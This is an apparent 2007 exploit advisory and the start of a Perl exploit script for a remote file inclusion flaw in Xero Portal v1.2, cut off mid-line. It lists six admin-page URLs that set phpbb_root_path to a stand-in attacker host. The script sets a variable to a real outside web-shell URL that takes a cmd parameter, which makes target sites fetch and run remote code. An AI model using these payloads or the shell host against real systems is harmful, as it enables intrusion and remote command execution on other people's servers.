|
#(C) XORON - 2007
#
# [Bug name: Xero Portal v1.2 (phpbb_root_path) Local File Include Vulnerablity
#
# [Script Name: Xero Portal v1.2
#
# [Wrong Codes: require($phpbb_root_path . 'includes/bbcode.'.$phpEx);
#
# [Exploit:
# www.[target].com/[script_pat]/admin/admin_linkdb.php?phpbb_root_path=http://evilscripts?
# www.[target].com/[script_pat]/admin/admin_forum_prune.php?phpbb_root_path=http://evilscripts?
# www.[target].com/[script_pat]/admin/admin_extensions.php?phpbb_root_path=http://evilscripts?
# www.[target].com/[script_pat]/admin/admin_board.php?phpbb_root_path=http://evilscripts?
# www.[target].com/[script_pat]/admin/admin_attachments.php?phpbb_root_path=http://evilscripts?
# www.[target].com/[script_pat]/admin/admin_users.php?phpbb_root_path=http://evilscripts?
#
# [xoron.biz - xoron.info]
#
# [Greetz: str0ke, kacper, k1tkat, SHiKAa
#
# [Tesekkurler: chaos, pang0, DJR, Dr Max Vir.s ;)
#
$rfi = "admin_linkdb.php?phpbb_root_path=";
$path = "/admin/";
$shell = "http://pang0.by.ru/shall/pang057.zz?cmd=";
print "Language: English // Turkish\nPlz Select Lang:\n"; $dil =